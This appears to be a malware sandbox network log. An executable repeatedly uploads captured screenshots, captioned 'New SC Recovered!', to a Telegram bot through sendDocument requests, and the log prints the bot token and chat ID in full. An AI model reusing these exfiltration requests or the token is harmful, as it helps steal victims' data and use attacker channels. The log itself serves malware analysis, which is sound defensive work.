                                                2024-07-25 22:03:05 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dd1279d3482702
                                                Host: api.telegram.org
                                                Content-Length: 60931
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:03:05 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:03:05 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 37 39 64 33 34 38 32 37 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 37 39 64 33 34 38 32 37 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 32 2f 32 30 32 34 20 30 32 3a 32 34 3a 31 36 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dd1279d3482702Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd1279d3482702Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/02/2024 02:24:16User
                                                2024-07-25 22:03:05 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:03:05 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:03:05 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:03:05 UTC10792OUTData Raw: e0 85 14 f8 61 92 77 d9 12 16 6c 67 02 a6 fe ce bb 3f f2 c4 fe 62 b2 9d 6a 70 76 9c 92 f5 66 b0 a3 56 6a f0 8b 6b c9 15 a8 ab 7f d9 b7 a7 fe 58 1f cc 53 65 b0 bb 86 33 24 90 95 41 d4 e4 54 ac 45 16 ec a6 be f4 53 c3 d6 4a ee 0f ee 65 6a 28 a2 b7 30 0a 28 a2 80 0a 28 a2 80 0a 2b 6e 2f 0d 5c cb 12 48 b3 c4 03 a8 61 9c f7 fc 29 df f0 8b dd ff 00 cf 78 7f 5f f0 ae 5f ad d1 ef f9 9d df d9 f8 9f e5 fc 57 f9 98 54 56 d4 be 1b ba 8a 27 90 cf 09 08 a5 8e 33 db f0 ac bb bb 59 6c e7 68 65 5c 11 d0 f6 23 d6 b4 85 7a 75 1d a2 cc aa e1 2b 52 8f 34 e3 64 43 45 14 56 c7 30 51 45 14 00 51 45 14 00 52 51 45 03 0a 28 a2 80 0a 28 a2 80 0a 28 a2 80 0a 29 28 a0 05 a4 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 00 28 a2 8a 06 25 14 b4 94 00 b4 94 66 8a 00 29 33 45 14
                                                Data Ascii: awlg?bjpvfVjkXSe3$ATESJej(0((+n/\Ha)x__WTV'3Ylhe\#zu+R4dCEV0QEQERQE((()((((((%f)3E
                                                2024-07-25 22:03:05 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 32 37 39 64 33 34 38 32 37 30 32 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dd1279d3482702--
                                                2024-07-25 22:03:06 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:03:06 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                25192.168.2.649754149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:03:07 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dd14f0e836a8c1
                                                Host: api.telegram.org
                                                Content-Length: 57561
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:03:08 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:03:08 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 66 30 65 38 33 36 61 38 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 66 30 65 38 33 36 61 38 63 31 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 35 2f 32 30 32 34 20 30 35 3a 35 31 3a 34 32 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dd14f0e836a8c1Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd14f0e836a8c1Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/05/2024 05:51:42User
                                                2024-07-25 22:03:08 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:03:08 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:03:08 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:03:08 UTC7422OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:03:08 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 34 66 30 65 38 33 36 61 38 63 31 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dd14f0e836a8c1--
                                                2024-07-25 22:03:08 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:03:08 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                26192.168.2.649755149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:03:12 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dd183344abb936
                                                Host: api.telegram.org
                                                Content-Length: 57561
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:03:12 UTC25INHTTP/1.1 100 Continue
                                                2024-07-25 22:03:12 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 38 33 33 34 34 61 62 62 39 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 38 33 33 34 34 61 62 62 39 33 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 31 32 2f 30 39 2f 32 30 32 34 20 30 39 3a 32 34 3a 32 33 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dd183344abb936Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dd183344abb936Content-Disposition: form-data; name="caption"New SC Recovered!Time: 12/09/2024 09:24:23User
                                                2024-07-25 22:03:12 UTC16355OUTData Raw: 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 73 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 a5 87 9c
                                                Data Ascii: !1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFshU9oM4UofORx?"
                                                2024-07-25 22:03:12 UTC16355OUTData Raw: 4a 5a 4a 00 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 51 40 05 14 51 40 01 a2 8a 28 00 a2 8a 28 18 51 45 14 00 94 52 d2 50 01 45 14 50 01 45 14 53 01 28 a2 8a 06 14 51 45 00 14 51 45 00 14 51 45 00 25 14 b4 94 00 52 52 d1 4c 62 51 45 14 20 0a 28 a2 80 0a 28 a2 80 0a 4a 5a 4a 06 14 51 45 00 14 51 45 30 0a 4a 5a 28 01 28 a5 a4 a0 02 8a 28 a0 61 49 8a 5a 29 80 94 51 45 00 14 51 45 00 14 51 45 03 0a 28 a2 80 0a 4a 5a 4a 60 14 1a 28 a0 02 8a 28 a6 01 49 4b 45 03 12 8a 29 69 80 94 51 45 00 25 14 b4 50 31 77 1f ad 21 0a 7a 8c 7d 28 a2 8b 08 69 8c 1f ba df 9d 34 a3 0e a2 9f 4a 09 1d 0d 16 2a ec 86 92 a7 24 1e a2 9a 51 4f 46 23 eb 40 f9 88 a8 a7 98 d8 76 cf d2 99 41 57 0f ce 8a 3a d2 d0 17 1b c5 18 a5 a4 a7 61 85 18 a3 14 51 60 1b 46 29 d4 94 58 77 1b
                                                Data Ascii: JZJ(QEQEQE%Q@Q@((QERPEPES(QEQEQE%RRLbQE ((JZJQEQE0JZ(((aIZ)QEQEQE(JZJ`((IKE)iQE%P1w!z}(i4J*$QOF#@vAW:aQ`F)Xw
                                                2024-07-25 22:03:12 UTC16355OUTData Raw: 8a 60 25 14 b4 50 02 51 4b 49 40 c2 8a 28 a0 02 93 14 b4 1a 00 4a 4a 5a 29 8c 4a 29 69 28 00 a2 8a 28 00 a4 a5 a2 98 09 4b 8a 28 a0 02 8c 51 45 00 25 2d 14 50 31 29 68 a2 98 85 5e a2 b4 ae bf d7 7e 03 f9 56 6a 8f 98 56 9d d7 fa e3 f4 1f ca b0 9f c4 81 7c 45 7a 29 68 a0 d4 4a 29 68 a0 04 a2 96 8c 50 02 51 4b 45 01 71 28 a5 c5 18 34 5c 2e 26 28 c5 3b 06 97 61 f4 a2 e2 b8 ca 31 4f d8 7b e0 51 f2 8e ac 29 5c 2e 43 3f 16 d2 ff 00 bb fd 6a ad 97 fa d6 fa 55 bb 92 9f 65 94 03 93 8f eb 55 2c b8 95 8e 3b 55 47 66 52 d8 bd 8a 5d a6 93 cd 3d 94 0a 43 2b 7a e3 f0 a9 d4 56 63 c2 1f 4a 5d 84 75 c0 a8 4b b1 ea 4d 25 16 61 ca c9 be 51 d5 c5 1b 90 77 26 a1 a2 9d 83 94 97 cc 51 fc 24 fd 69 0c be 8a 2a 3a 4a 39 50 f9 50 ff 00 35 fd 71 f4 a4 2c c7 ab 13 4d a2 9d 90 ec 2d 14
                                                Data Ascii: `%PQKI@(JJZ)J)i((K(QE%-P1)h^~VjV|Ez)hJ)hPQKEq(4\.&(;a1O{Q)\.C?jUeU,;UGfR]=C+zVcJ]uKM%aQw&Q$i*:J9PP5q,M-
                                                2024-07-25 22:03:12 UTC7422OUTData Raw: 31 dc 98 e5 84 7d e1 2b 1c 07 27 b8 3c 00 7b 63 1e e5 41 62 9b fc b6 db b0 c9 9c 8f ba 1b 69 3d 7d 78 aa 9f d9 96 bb 76 88 f1 f4 a5 5d 36 d9 18 30 0d 91 ef 5a d1 a5 52 94 79 53 47 3d 7a f4 6b cb 99 a6 5b 1c 8c d1 48 38 18 a2 ba cf 3c 5a 33 49 45 20 17 34 94 51 40 05 14 51 40 05 14 51 40 05 14 51 40 05 14 51 4c 02 8a 28 a0 61 45 14 94 80 5a 4a 28 a6 01 45 14 50 01 45 14 50 01 45 14 50 02 51 45 14 0c 28 a2 8a 00 4a 28 a2 80 0a 28 a2 81 85 14 52 50 01 45 14 50 01 45 14 50 30 a4 a2 8a 00 28 a2 8a 00 29 28 a2 80 0a 28 a2 81 89 45 2d 25 00 14 51 49 40 05 14 51 40 c2 8a 29 28 00 a2 8a 28 18 52 52 d2 50 01 45 25 14 0c 28 a2 8a 00 29 28 a2 98 c2 8a 29 28 00 a2 8a 29 00 94 51 45 31 85 25 14 50 30 a4 a5 a4 a0 02 8a 28 a0 61 49 45 14 00 52 52 d2 50 30 a2 8a 28 01 28
                                                Data Ascii: 1}+'<{cAbi=}xv]60ZRySG=zk[H8<Z3IE 4Q@Q@Q@Q@QL(aEZJ(EPEPEPQE(J((RPEPEP0()((E-%QI@Q@)((RRPE%()()()QE1%P0(aIERRP0((
                                                2024-07-25 22:03:12 UTC50OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 31 38 33 33 34 34 61 62 62 39 33 36 2d 2d 0d 0a
                                                Data Ascii: -----------------------------8dd183344abb936--
                                                2024-07-25 22:03:13 UTC405INHTTP/1.1 401 Unauthorized
                                                Server: nginx/1.18.0
                                                Date: Thu, 25 Jul 2024 22:03:13 GMT
                                                Content-Type: application/json
                                                Content-Length: 58
                                                Connection: close
                                                Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                Access-Control-Allow-Origin: *
                                                Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                {"ok":false,"error_code":401,"description":"Unauthorized"}


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                27192.168.2.649756149.154.167.2204435020C:\Users\user\Desktop\LisectAVT_2403002A_127.exe
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:03:16 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dd1ad724ca83fa
                                                Host: api.telegram.org
                                                Content-Length: 57561
                                                Expect: 100-continue
                                                Connection: Keep-Alive


                                                Session IDSource IPSource PortDestination IPDestination Port
                                                28192.168.2.649757149.154.167.220443
                                                TimestampBytes transferredDirectionData
                                                2024-07-25 22:03:17 UTC262OUTPOST /bot6240128422:AAGfewUxVcQqKio_MV181yAuk31JpsBcgy8/sendDocument HTTP/1.1
                                                Content-Type: multipart/form-data; boundary=---------------------------8dcacd40e7a0308
                                                Host: api.telegram.org
                                                Content-Length: 57561
                                                Expect: 100-continue
                                                Connection: Keep-Alive
                                                2024-07-25 22:03:17 UTC1024OUTData Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 34 30 65 37 61 30 33 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 33 39 34 35 35 30 32 34 36 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 63 61 63 64 34 30 65 37 61 30 33 30 38 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 37 2f 32 35 2f 32 30 32 34 20 31 38 3a 30 33 3a 31 35 0a 55 73 65 72
                                                Data Ascii: -----------------------------8dcacd40e7a0308Content-Disposition: form-data; name="chat_id"1394550246-----------------------------8dcacd40e7a0308Content-Disposition: form-data; name="caption"New SC Recovered!Time: 07/25/2024 18:03:15User
